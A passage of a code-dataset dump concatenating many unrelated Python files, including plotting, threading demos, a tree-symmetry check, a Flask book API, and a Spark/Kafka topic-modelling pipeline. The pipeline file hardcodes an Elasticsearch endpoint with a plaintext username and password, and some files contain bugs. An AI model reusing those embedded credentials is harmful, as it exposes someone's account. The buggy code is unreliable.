x_array = np.arange(1, years.shape[0]+1, 1)\n techs = results.index\n colors = matplotlib.cm.Paired(np.linspace(0, 1, techs.shape[0]))\n\n # Create plot.\n fig, ax = plt.subplots(1, 1)\n for i in np.arange(0, techs.shape[0], 1):\n ax.scatter(\n x_array,\n np.array(results.iloc[i, :]),\n marker='o', facecolors='none', edgecolors=colors[i], s=70\n )\n ax.plot(\n x_array,\n np.array(results.iloc[i, :]),\n linestyle='-', color=colors[i], label='%s' % techs[i]\n )\n\n # Modify plot.\n ax.legend(loc='upper right', fontsize=9)\n ax.set_ylabel('years')\n ax.set_xticks(x_array)\n labels = [item.get_text() for item in ax.get_xticklabels()]\n for y in np.arange(0, len(x_array), 1):\n labels[y] = years[y]\n ax.set_xticklabels(labels)\n\n # Modify plot title.\n if plot_type == 'discounted_payback_time':\n title = 'Discounted payback time in years.'\n else:\n title = 'Simple payback time in years.'\n fig.suptitle(title)\n\n # Save plot to SVG.\n fig.savefig(os.path.join(results_path, plot_type + '_comparison.svg'))\n","sub_path":"cobmo/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"185356178","text":"import threading\nimport concurrent.futures\nimport time\n\nstart = time.perf_counter()\n\ndef do_something(second):\n print(f\"I am sleeping for {second} second(s)\")\n time.sleep(second)\n return \"done sleeping\"\n\n\nt1 = threading.Thread(target=do_something) # making a thread (1)\nt2 = threading.Thread(target=do_something) # making a thread (2)\n\nt1.start()\nt2.start()\n\nt1.join()\nt2.join() \n\n# making 10 threads\n\nthreads = []\nfor _ in range(10):\n t = threading.Thread(target=do_something, args=[1.5])\n t.start()\n threads.append(t)\n\nfor thread in threads:\n thread.join()\n\n# alternative of threading\n\nwith concurrent.futures.ThreadPoolExecutor() as executor:\n \n f1 = executor.submit(do_something, 1)\n f2 = executor.submit(do_something, 1)\n\n print(f1.result())\n print(f2.result())\n\n secs = [5,4,3,2,1,1,4,3,2,5]\n\n results = [executor.submit(do_something, sec) for sec in secs]\n\n for f in concurrent.futures.as_completed(results):\n print(f.result())\n\n# alternative of threading and concurrent.submit\n\nwith concurrent.futures.ThreadPoolExecutor() as executor:\n\n secs = [5,5,4,3,2,1,4,3]\n results = executor.map(do_something, secs)\n\n for result in results:\n print(result)\n\nfinish = time.perf_counter()\n\nprint(f'finished in {round(finish-start,2)} seconds')","sub_path":"Threading/threading-2.py","file_name":"threading-2.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"325046216","text":"\"\"\"Is the tree symmetric.\n\nGiven a binary tree t, determine whether it is symmetric around its center,\ni.e. each side mirrors the other.\n\nCreated on Sun Sep 26 09:45:48 2021\n\n@author: gonzo\n\"\"\"\n\n\nfrom collections import deque\n\n\nclass Vertex:\n \"\"\"Vertex object in a binary tree.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize Vertex object.\n\n Fields\n ----------\n value : int\n The value of node v\n left : None\n The left child of node v\n right : None\n The right child of node v\n \"\"\"\n self.value = None\n self.left = None\n self.right = None\n\n\ndef is_tree_symmetric(root):\n \"\"\"Use bfs to see that each level is around the centre symmetric.\"\"\"\n # Empty tree or single node are symmetric\n if root is None or (root.left is None and root.right is None):\n return True\n # Only one child of root exists\n elif root.left is None and root.right is not None or \\\n root.right is None and root.left is not None:\n return False\n else:\n # Enque both childre of root since they exist\n q = deque([root.left, root.right])\n\n while q:\n left_node = q.popleft()\n right_node = q.popleft()\n\n if left_node.value != right_node.value:\n return False\n else:\n # Append left child of left subtree and right child of right\n # subtree if they both exist\n if left_node.left is not None and right_node.right is not None:\n q.append(left_node.left)\n q.append(right_node.right) \n # If only one exists then its asymmetric\n elif left_node.left is None and right_node.right is not None or \\\n left_node.left is not None and right_node.right is None:\n return False\n \n # Append right child of left subtree and left child of right\n # subtree if they both exist\n if left_node.right is not None and right_node.left is not None:\n q.append(left_node.right)\n q.append(right_node.left)\n elif left_node.right is None and right_node.left is not None or \\\n left_node.right is None and right_node.left is not None:\n return False\n\n return True\n\n\nif __name__ == '__main__':\n\n # t = {\n # \"value\": 1,\n # \"left\": {\n # \"value\": 2,\n # \"left\": {\n # \"value\": 3,\n # \"left\": None,\n # \"right\": None\n # },\n # \"right\": {\n # \"value\": 4,\n # \"left\": None,\n # \"right\": None\n # }\n # },\n # \"right\": {\n # \"value\": 2,\n # \"left\": {\n # \"value\": 4,\n # \"left\": None,\n # \"right\": None\n # },\n # \"right\": {\n # \"value\": 3,\n # \"left\": None,\n # \"right\": None\n # }\n # }\n # }\n\n # t = {\"value\": 1,\n # \"left\": {\n # \"value\": 2,\n # \"left\": None,\n # \"right\": {\n # \"value\": 3,\n # \"left\": None,\n # \"right\": None\n # }\n # },\n # \"right\": {\n # \"value\": 2,\n # \"left\": None,\n # \"right\": {\n # \"value\": 3,\n # \"left\": None,\n # \"right\": None\n # }\n # }\n # }\n\n # root = Vertex()\n # root.value = 1\n # root.left = Vertex()\n # root.left.value = 2\n # root.left.left = Vertex()\n # root.left.left.value = 3\n # root.left.left.left = None\n # root.left.left.right = None\n # root.left.right = Vertex()\n # root.left.right.value = 4\n # root.left.right.left = None\n # root.left.right.right = None\n\n # root.right = Vertex()\n # root.right.value = 2\n # root.right.left = Vertex()\n # root.right.left.value = 4\n # root.right.left.left = None\n # root.right.left.right = None\n # root.right.right = Vertex()\n # root.right.right.value = 3\n # root.right.right.left = None\n # root.right.right.right = None\n\n # root = Vertex()\n # root.value = 1000\n \n # root = Vertex()\n # root.value = 0\n # root.left = Vertex()\n # root.left.value = 6\n\n # root = Vertex()\n root = None\n\n print(is_tree_symmetric(root))\n\n","sub_path":"Interview_Practice/Data_Structures/Trees/is_tree_symmetric.py","file_name":"is_tree_symmetric.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"494675279","text":"import logging\n\n\ndef get_logger(file_name:str):\n \"\"\"logger module for logging\n args: file_name (str) : Name of the file being used\"\"\"\n logger = logging.getLogger(file_name)\n formatter = logging.Formatter(\n \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\",\n datefmt=\"%m/%d/%Y %H:%M:%S\",\n )\n handler = logging.StreamHandler()\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(logging.INFO)\n return logger\n","sub_path":"utils/logger_module.py","file_name":"logger_module.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"234544969","text":"\"\"\"\nIt is possible to show that the square root of two can be expressed as an infinite continued fraction.\n\n2–?=1+12+12+12+…\nBy expanding this for the first four iterations, we get:\n\n1+12=32=1.5\n1+12+12=75=1.4\n1+12+12+12=1712=1.41666…\n1+12+12+12+12=4129=1.41379…\n\nThe next three expansions are 9970, 239169, and 577408, but the eighth expansion, 1393985, is the first example where the number of digits in the numerator exceeds the number of digits in the denominator.\n\nIn the first one-thousand expansions, how many fractions contain a numerator with more digits than the denominator?\n\"\"\"\nimport time\nfrom fractions import Fraction\nstart_time = time.time()\n\ncount = 2\ntotal = 0\nres = 2 + Fraction(1, 2)\n\nfor x in range(0, 1001):\n while count < x:\n res = 2 + 1 / res\n count += 1\n # print(count, 1 + 1 / res)\n if len(str(Fraction(1 + 1 / res).numerator)) > len(str(Fraction(1 + 1 / res).denominator)):\n total += 1\n\nprint(total)\n\n\n\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n# input()","sub_path":"57.py","file_name":"57.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"100047318","text":"# %load q08_preprocessing/build.py\nimport pandas as pd\nimport numpy as np\nimport sys,os\nsys.path.append(os.path.join(os.path.dirname(os.curdir)))\nfrom greyatomlib.game_of_thrones.q01_feature_engineering.build import q01_feature_engineering\nfrom greyatomlib.game_of_thrones.q07_culture_survival.build import q07_culture_survival\n\nbattles = pd.read_csv('data/battles.csv')\ncharacter_predictions = pd.read_csv('data/character-predictions.csv')\n\nbattle, character_pred = q01_feature_engineering(battles,character_predictions)\ndef q08_preprocessing(data):\n #'write your solution here'\n colu = ['title','culture','mother','father','house','heir' ,'spouse']\n for col in colu:\n data[col] = pd.factorize(data[col])[0]\n col_1 = ['name', 'alive', 'pred', 'plod', 'isAlive', 'dateOfBirth']\n data = data.drop(col_1, 1) \n col = data.columns\n for c in col:\n data[c] = data[c].replace(['.', '_'], ' ')\n for c in col:\n data[c] = data[c].replace(np.nan, -1)\n \n return (data)\n\n# q08_preprocessing(character_pred)\n\n\n","sub_path":"q08_preprocessing/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"365971924","text":"from flask import Flask, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nimport os\n\napp = Flask(__name__)\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///\" + os.path.join(basedir, \"app.sqlite\")\n\ndb = SQLAlchemy(app)\nma = Marshmallow(app)\n\nclass Book(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(100), nullable=False)\n author = db.Column(db.String(100), nullable=False)\n url = db.Column(db.String(100), nullable=False)\n genre = db.Column(db.String(100), nullable=False)\n star_rating = db.Column(db.String(100), nullable=False)\n book_read = db.Column(db.Boolean)\n\n\nclass bookSchema(ma.Schema):\n class Meta:\n fields = (\"id\", \"title\", \"author\", \"url\", \"genre\", \"star_rating\", \"book_read\")\n\nbook_schema = bookSchema()\nbooks_schema = bookSchema(many=True)\n\n# POST\n@app.route(\"/add-book\", methods=[\"POST\"])\ndef add_book():\n title = request.json[\"title\"]\n author = request.json[\"author\"]\n url = request.json[\"url\"]\n genre = request.json[\"genre\"]\n star_rating = request.json[\"star_rating\"]\n book_read = request.json[\"book_read\"]\n new_book = Book(titles=title, author=author, url=url, genre=genre, star_rating=star_rating, book_read=book_read)\n db.session.add(new_book)\n db.session.commit()\n return jsonify(message=\"Success\")\n\n\n# GET\n@app.route(\"/books\", methods=[\"GET\"])\ndef get_books():\n order = request.args.get('order')\n if (order == 'desc'):\n all_books = Book.query.order_by(Book.id.desc()).all()\n else:\n all_books = Book.query.all()\n result = books_schema.dump(all_books)\n return jsonify(result)\n\n\n# PUT/PATCH by ID\n@app.route(\"/book-read/<id>\", methods=[\"PATCH\"])\ndef update_book(id):\n book = Book.query.get(id)\n book.book_read = request.json[\"bookread\"]\n db.session.commit()\n return jsonify(message=\"Book Updated\")\n\n\n# DELETE\n@app.route(\"/delete-book/<id>\", methods=[\"DELETE\"])\ndef delete_book(id):\n book = book.query.get(id)\n db.session.delete(book)\n db.session.commit()\n return jsonify(message=\"Book Deleted!\")\n\n\nif __name__ == \"__main__\":\n app.debug = True\n app.run()","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"320053485","text":"import pyspark\nfrom pyspark.sql.functions import *\nfrom pyspark.sql import SQLContext, SparkSession, Row\nfrom nltk.corpus import stopwords\nimport re as re\nimport os\nfrom pyspark.ml.feature import CountVectorizer , IDF, Tokenizer, StopWordsRemover\nfrom kafka import KafkaConsumer\nfrom pyspark.mllib.linalg import Vector, Vectors\n# from pyspark.mllib.clustering import LDA, LDAModel\nfrom pyspark.ml.clustering import LDA as newLDA\nimport json\nfrom datetime import datetime\nfrom elasticsearch import Elasticsearch\nimport time\n\n# data = sqlContext.read.format(\"csv\").options(header='true', inferschema='true')\\\n# .load(os.path.realpath(\"clothingReviews.csv\"))\n# reviews = data.filter(\"'Review Text' IS NOT NULL\")['Review Text']\n# reviewsRdd = reviews.rdd\n#\n# tokens = reviewsRdd \\\n# .map( lambda document: document.strip().lower()) \\\n# .map( lambda document: re.split(\" \", document)) \\\n# .map( lambda word: [x for x in word if x.isalpha()]) \\\n# .map( lambda word: [x for x in word if len(x) > 3] ) \\\n# .map( lambda word: [x for x in word if x not in StopWords]) \\\n# # .zipWithIndex()\n\nclass SparkInstance:\n def __init__(self,AppName =\"NLPApp\"):\n self.sparkSess = SparkSession.builder.master(\"spark://152.7.99.47:7077\").appName(\"TopicModeling\").getOrCreate()\n self.sc = self.sparkSess.sparkContext\n self.sqlContext = SQLContext(self.sc)\n\n def closeConnection(self):\n self.sc.stop()\n\nclass ConsumerInstance():\n def __init__(self, brokerList=\"localhost:9092\", topicList=\"default-topic\"):\n self.bootstrapServerList = brokerList\n self.topics = topicList\n self.Consumer = KafkaConsumer(bootstrap_servers=self.bootstrapServerList,\n auto_offset_reset='earliest',\n consumer_timeout_ms=1000)\n self.Consumer.subscribe(self.topics)\n\n def close(self):\n self.Consumer.close()\n\n def getKafkaConsumer(self):\n return self.Consumer\n\ndef getTopics(sc,sqlContext,inpSubtitles):\n # myInp = \"Topics correspond to cluster centers, and documents correspond to examples rows in a dataset \\nTopics and documents both exist in a feature space, where feature vectors are vectors of word counts bag of words \\nRather than estimating a clustering using a traditional distance, LDA uses a function based on a statistical model of how text documents are generated\"\n myInp = inpSubtitles\n inpData = sc.parallelize(myInp.splitlines())\n # myInpSplittedList = inpData.map(lambda x: x.split('\\n') )\n # res = myInpSplittedList.collect()\n row_rdd = inpData.map(lambda x: re.sub(\"\\s+\",\" \",x))\\\n .map(lambda x: x.split(\" \"))\\\n .map(lambda x: [word for word in x if word is not ''])\\\n .map(lambda x: Row(x))\n df = sqlContext.createDataFrame(row_rdd, ['allWords'])\n mainDf = df.withColumn(\"index\", monotonically_increasing_id())\n\n remover = StopWordsRemover(inputCol=\"allWords\", outputCol=\"words\")\n res = remover.transform(mainDf)\n cv = CountVectorizer(inputCol=\"words\", outputCol=\"features\")\n model = cv.fit(res) # even df works\n result = model.transform(res)\n #result.show(truncate=False)\n\n idf = IDF(inputCol=\"features\", outputCol=\"finalFeatures\")\n idfModel = idf.fit(result)\n result_tfidf = idfModel.transform(result)\n num_topics = 5\n # lda_model = LDA.train(result_tfidf['index','finalFeatures'],k = num_topics, maxIterations= 100)\n lda_obj = newLDA(featuresCol=\"finalFeatures\", k=3, maxIter=100)\n lda_model = lda_obj.fit(result_tfidf[\"index\", \"finalFeatures\"])\n #lda_model.describeTopics().show()\n topics = lda_model.describeTopics()\n topics_rdd = topics.rdd\n vocab = model.vocabulary\n topicsWordsRdd = topics_rdd.map(lambda x: x['termIndices']).map(lambda x: [vocab[idx] for idx in x])\n\n topics_words = topicsWordsRdd.collect()\n # for idx, topic in enumerate(topics_words):\n # print(\"topic: \", idx)\n #\n # for word in topic:\n # print(word + \",\", end=\" \")\n # print(\"----------\")\n return topics_words\n\ndef getSubsMetaFromRecord(message):\n valBytes = message.value\n decodedValueString = valBytes.decode(\"utf-8\")\n valueStringModified = decodedValueString.replace(\"'\", '\"')\n #print(valueStringModified)\n valueJson = json.loads(valueStringModified)\n #print(messageJson)\n return valueJson\n\ndef getTopKeywordsFromTopics(inpTopics):\n topKeywordList = []\n for topic in inpTopics:\n topKeywordList.extend(topic[0:3])\n\n return topKeywordList\n\n\ndef main():\n kafkaBrokerList = [\"152.46.17.189:9092\", \"152.46.17.100:9092\", \"152.46.16.167:9092\"]\n topicNameList = [\"VideoSubtitles\"]\n DataReader = ConsumerInstance(kafkaBrokerList, topicNameList).getKafkaConsumer()\n print(\"Kafka Cluster Connected\")\n sparkInst = SparkInstance()\n sparkInst.sc.setLogLevel(\"WARN\")\n print(\"Spark Cluster Connected\")\n es = Elasticsearch(\n ['https://a58c0275b4c1417bb6316d68575d3f85.us-east-1.aws.found.io:9243'],\n http_auth=('elastic', 'B7Zck6OCKO1cQ85ftjlqNE7W'),\n scheme=\"https\",\n port=443,\n )\n print(\"Elasticsearch Connected\")\n\n\n try:\n while True:\n for record in DataReader:\n if(record):\n # print(record.value)\n # print(message)\n try:\n subsMetaDict = getSubsMetaFromRecord(record)\n except:\n print(\"Error in Parsing input from Kafka \"+record.value.decode(\"utf-8\"))\n print(\"\\n###################----------###################\\n\")\n continue\n print(subsMetaDict['meta'])\n doc = {}\n doc['meta'] = subsMetaDict['meta']\n metaDat = doc['meta']\n ind = metaDat['id']\n if not es.exists(index=\"keywordrecommender\", doc_type='keywords', id = ind):\n topicsWordArrayList = getTopics(sparkInst.sc, sparkInst.sqlContext, subsMetaDict['extract'])\n topKeywordsList = getTopKeywordsFromTopics(topicsWordArrayList)\n print(topKeywordsList)\n doc['keywords'] = topKeywordsList\n # print(ind)\n res = es.index(index=\"keywordrecommender\", doc_type='keywords', id = ind, body=doc)\n print(res['result'])\n else:\n print(\"Video already Processed. Skipping\")\n print(\"\\n###################----------###################\\n\")\n # count += 1\n # if count > 2:\n # break\n # print(topicsWordArrayList)\n # for message in DataReader.poll(max_records=1):\n print(\"Buffer Empty. Wait for 10 min to try again\")\n time.sleep(600)\n except Exception as e:\n print(\"Error Occurred: \"+str(e))\n finally:\n # sparkInst.closeConnection()\n DataReader.close()\n # es.close()\n print(\"Spark and Kafka Connections closed!\")\n\n#sc.stop()\n#print(res)\n#data = []\nif __name__ == \"__main__\":\n main()\n","sub_path":"MainPipeline/NLP.py","file_name":"NLP.py","file_ext":"py","file_size_in_byte":7370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"492523327","text":"max = int(input(\"Find primes up to what number?: \"))\n\ndef solution_1(num):\n prime_nums = []\n for x in range(2, num + 1): #range starts at 0\n isPrime = True\n for y in range(2, x):\n if x % y == 0:\n isPrime = False\n break\n if isPrime: \n prime_nums.append(x)\n return prime_nums\n\n\n## stop at square root of each number\ndef solution_2(num):\n prime_nums = []\n for x in range(2, max + 1):\n isPrime = True\n for y in range(2, int(x**0.5)+1):\n if x % y == 0:\n isPrime = False\n break\n if isPrime: \n prime_nums.append(x)\n return prime_nums\n\n\nprint(solution_2(max))\n\n## solution 3\nstart = 11\nend = 25\n\nfor i in range(start,end):\n if i>1:\n for j in range(2,i):\n if(i % j==0):\n break\n else:\n print(i)","sub_path":"prime_numbers.py","file_name":"prime_numbers.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"193914932","text":"from enum import Enum\nMonth=Enum('kk',('jan','feb','mon'))\nprint(Month.__name__)#类名name是kk\nprint(type(Month))#month是类,而非对象\nmoth=Month()\nprint(Month.jan.value)#\n\nclass Week(Enum):\n Sun=0\n Mon=1\n Tue=2\nprint(Week.Sun.value)#拿到枚举值后,通过value取它的值\n#判断是对象还是类可以通过type\n","sub_path":"practice_oop/Ex_Enum.py","file_name":"Ex_Enum.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"204648068","text":"import pandas as pd\n\ndf = pd.read_csv('symbol.csv')\ndf.head()\n\nkeyword = df['keyword'].dropna().values\nmath_oprator = df['Arithmetic Operators'].dropna().values\nlogical = df['Logical Operators'].dropna().values\nbitwise = df['Bitwise Operators'].dropna().values\nother = df['Other Operators'].dropna().values\n\nf = open('in', 'r')\nfile = f.read()\n\ndef lexical_analyzer(file):\n return file.split()\n\ndef symbol_table(inputs):\n k = []\n m = []\n l = []\n b = []\n o = []\n n = []\n i = []\n f = []\n\n for data in inputs:\n if data in keyword:\n if data not in k:\n k.append(data)\n elif data in math_oprator:\n if data not in m:\n m.append(data)\n elif data in logical:\n if data not in l:\n l.append(data)\n elif data in bitwise:\n if data not in b:\n b.append(data)\n elif data in other:\n if data not in o:\n o.append(data)\n else:\n try:\n num = int(data)\n if num not in n:\n n.append(num)\n except:\n try:\n num = float(data)\n if num not in f:\n f.append(num)\n except:\n if data not in i:\n i.append(data)\n\n outputs = {\n 'Keywords': k,\n 'Identifiers': i,\n 'Math Operators': m,\n 'Logical Operators': l + b,\n 'Numerical Values': n + f,\n 'Others': o\n }\n return outputs\n\nlexic = lexical_analyzer(file)\ntable = symbol_table(inputs=lexic)\ndf1 = pd.DataFrame([table], columns=table.keys())\nprint(df1)\nf = open('out', 'w')\nfor i in table:\n f.write(i)\n f.write(str(table[i]))\n f.write(\"\\n\")\n\n","sub_path":"Practice/lexAnalyze.py","file_name":"lexAnalyze.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"366153424","text":"import sys\nn = int(input())\nfor _ in range(n):\n even = []\n x = list(map(int,sys.stdin.readline().split()))\n for i in x:\n if i % 2 ==0:\n even.append(i)\n print(sum(even), min(even))\n\n","sub_path":"BOJ/boj_3058.py","file_name":"boj_3058.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"552913929","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\nimport random, math\nfrom math import pi\nfrom MySQLDatabaseProxy import MySQLDatabaseProxy\nfrom Requirement import Requirement\nimport RequirementScoreFactory\n\n\nclass ChernoffFace:\n def __init__(self,objtName,dp):\n self.p = RequirementScoreFactory.build(dp.dimensionObject(objtName,'requirement'))\n self.head_radius = 30\n self.eye_radius = 5\n self.eye_left_x = 40\n self.eye_right_x = 60\n self.eye_y = 40\n self.pupil_radius = 1.5\n self.eyebrow_l_l_x = 35\n self.eyebrow_r_l_x = 55\n self.eyebrow_l_r_x = 45\n self.eyebrow_r_r_x = 65\n self.eyebrow_y = 30\n self.nose_apex_x = 50\n self.nose_apex_y = 45\n self.nose_height = 16\n self.nose_width = 8\n self.mouth_y = 65\n\n\n def draw(self, cr, x=0, y=0, width=100, height=100,highlight=False,zoom_ratio=-1):\n reqScore = self.p[0] + self.p[1] + self.p[2]\n if (zoom_ratio == -1) or (zoom_ratio < 0.4 and reqScore < 2) or (zoom_ratio > 0.4):\n self.cr = cr\n self.head_radius = 18\n self.eye_radius = 2.5\n self.eye_left_x = x - 5\n self.eye_right_x = x + 5\n self.eye_y = y - 5\n self.eyebrow_l_l_x = self.eye_left_x - 2.5\n self.eyebrow_r_l_x = self.eye_right_x - 2.5\n self.eyebrow_l_r_x = self.eye_left_x + 2.5\n self.eyebrow_r_r_x = self.eye_right_x + 2.5\n self.eyebrow_y = self.eye_y - 5\n self.nose_apex_x = x\n self.nose_apex_y = y - 3\n self.nose_height = 2\n self.nose_width = 1.5\n self.mouth_y = y + 7\n\n self.x_factor = width / 100.0\n self.y_factor = height / 100.0\n self.x_origin = x\n self.y_origin = y\n\n self.cr.new_sub_path()\n self.xOval(x,y, self.head_radius, self.head_radius)\n\n\n\n eye_spacing = int((0.5 - 0.5) * 10)\n eye_size = int( ((0.5 - 0.5) / 2.0) * 10 )\n e0, e1 = self.eccentricities(self.p[1])\n\n self.cr.new_sub_path()\n self.xOval(self.eye_left_x - eye_spacing, self.eye_y,\n self.eye_radius + eye_size + e0, self.eye_radius + eye_size + e1)\n self.cr.new_sub_path()\n self.xOval(self.eye_right_x + eye_spacing, self.eye_y,\n self.eye_radius + eye_size + e0, self.eye_radius + eye_size + e1)\n\n pupil_size_x = int(max(1, self.p[1] * self.pupil_radius * self.x_factor))\n pupil_size_y = int(max(1, self.p[1] * self.pupil_radius * self.y_factor))\n self.cr.new_sub_path()\n self.xFillOval(self.eye_left_x, self.eye_y,\n pupil_size_x, pupil_size_y)\n self.cr.new_sub_path()\n self.xFillOval(self.eye_right_x, self.eye_y,\n pupil_size_x, pupil_size_y)\n\n y1 = self.eyebrow_y + int((self.p[0] - 0.5) * 10)\n y2 = self.eyebrow_y - int((self.p[0] - 0.5) * 10)\n\n self.xLine(self.eyebrow_l_l_x, y1, self.eyebrow_l_r_x, y2)\n self.xLine(self.eyebrow_r_l_x, y2, self.eyebrow_r_r_x, y1)\n\n y += int(((0.5 - 0.5) / 2.0) * 10)\n self.cr.save()\n self.cr.move_to(self.nose_apex_x, self.nose_apex_y)\n self.cr.line_to(self.nose_apex_x - (self.nose_width / 2), y)\n self.cr.line_to(self.nose_apex_x + (self.nose_width / 2), y)\n self.cr.close_path()\n self.cr.restore()\n\n mouth_size = ((0.5 - 0.5) * 10)\n x1 = self.eye_left_x - mouth_size\n y1 = self.mouth_y\n x2 = self.eye_right_x + mouth_size\n y2 = self.mouth_y\n x3 = ((x2 - x1) / 2) + x1\n y3 = ((self.p[2] - 0.5) * 10) + self.mouth_y\n self.draw_lip(x1, y1, x2, y2, x3, y3)\n\n pen = self.select_pen(highlight)\n self.cr.set_line_width(pen.linewidth)\n self.cr.set_source_rgba(*pen.color) \n self.cr.stroke()\n\n def draw_lip(self, x1, y1, x2, y2, x3, y3):\n x1_2 = x1 ** 2\n x2_2 = x2 ** 2\n x3_2 = x3 ** 2\n denom = (x1_2 * (x2 - x3)) \\\n + (x1 * (x3_2 - x2_2)) \\\n + (x2_2 * x3) \\\n - (x3_2 * x2)\n denom = float(denom)\n\n a = ( (y1 * (x2 - x3))\n + (x1 * (y3 - y2))\n + (y2 * x3)\n + -(y3 * x2)\n ) / denom\n\n bb = ( (x1_2 * (y2 - y3))\n + (y1 * (x3_2 - x2_2))\n + (x2_2 * y3)\n - (x3_2 * y2)\n ) / denom\n\n c = ( (x1_2 * ((x2 * y3) - (x3 * y2)))\n + (x1 * ((x3_2 * y2) - (x2_2 * y3)))\n + (y1 * ((x2_2 * x3) - (x3_2 * x2)))\n ) / denom\n\n last_x = int(x1)\n last_y = int(y1)\n for i in xrange(int(x1), int(x2+1)):\n new_x = i\n new_y = int(a * i**2 + bb*i + c)\n self.xLine(last_x, last_y, new_x, new_y)\n last_x = new_x\n last_y = new_y\n\n\n def eccentricities(self, p):\n if p > 0.5:\n return [int((p - 0.5) * 20.0), 0]\n else:\n return [0, int(abs(p - 0.5) * 20.0)]\n\n def xOval(self,x,y,height_r,width_r):\n self.cr.save()\n self.cr.translate(x,y)\n self.cr.scale(width_r, height_r)\n self.cr.arc(0.0,0.0,1.0,0.0,2.0 * pi)\n self.cr.restore()\n\n def xFillOval(self,x,y,height_r,width_r):\n self.cr.save()\n self.cr.translate(x,y)\n self.cr.scale(width_r, height_r)\n self.cr.arc(0.0,0.0,1.0,0.0,2.0 * pi)\n self.cr.restore()\n\n def xLine(self,x1,y1,x2,y2):\n self.cr.save()\n self.cr.move_to(x1,y1)\n self.cr.line_to(x2,y2)\n self.cr.restore()\n","sub_path":"cairis/cairis/ChernoffFace.py","file_name":"ChernoffFace.py","file_ext":"py","file_size_in_byte":5803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"6494935","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom model.mma_features import PcaEloWrapper, BinaryEloWrapper, AccEloWrapper\nfrom sklearn.metrics import log_loss\nfrom model.mma_log_reg_stan import SimpleSymmetricModel\n\n\nclass HyperParamTester(object):\n\n def __init__(self, model):\n self.df = self.prep_dataset()\n self.model = model\n self.static_feat_df = self.get_static_feat_df()\n\n def test_hp_range(self, n_draws):\n results = []\n # for _ in range(n_draws):\n # pca_elo_alpha = np.random.uniform(0, 1)\n # binary_elo_alpha = np.random.uniform(0, 1)\n # acc_elo_alpha = np.random.uniform(0, 1)\n # n_pca = np.random.choice(range(6, 20))\n elo_alpha_vals = np.linspace(0.25, 1, n_draws+2)[1:-1]\n for pca_elo_alpha in [0.55, 0.6, 0.65, 0.7]:\n for binary_elo_alpha in [0.8, 0.85, 0.9, 0.95]:\n for acc_elo_alpha in [0.8, 0.85, 0.9, 0.95]:\n for n_pca in [8, 9, 10, 11]:\n print(f\"\"\"testing the following params:\n pca elo alpha: {pca_elo_alpha}\n bin elo alpha: {binary_elo_alpha}\n acc elo alpha: {acc_elo_alpha}\n n pca components: {n_pca}\"\"\")\n curr_result = self.test_hp(\n pca_elo_alpha, binary_elo_alpha, acc_elo_alpha, n_pca\n )\n print(curr_result)\n results.append(curr_result)\n return pd.DataFrame(results)\n \n def test_hp(self, pca_elo_alpha=0.5, binary_elo_alpha=0.5, acc_elo_alpha=0.5, n_pca=16):\n acc_elo_feat_df = self.get_acc_elo_df(acc_elo_alpha)\n pca_elo_feat_df = self.get_pca_elo_df(pca_elo_alpha, n_pca)\n bin_elo_feat_df = self.get_binary_elo_df(binary_elo_alpha)\n\n feat_df = self.static_feat_df.merge(\n pca_elo_feat_df, on=\"espn_fight_id\", how=\"left\",\n ).merge(\n bin_elo_feat_df, on=\"espn_fight_id\", how=\"left\"\n ).merge(\n acc_elo_feat_df, on=\"espn_fight_id\", how=\"left\"\n )\n\n feat_cols = [\n \"log_height_diff\", \n \"log_reach_diff\", \n \"age_diff\", \n # \"t_since_last_fight_log_diff\", \n \"sqrt_n_career_fights_diff\",\n \"log_t_since_first_fight_diff\",\n \"min_weight_diff\",\n # binary elo 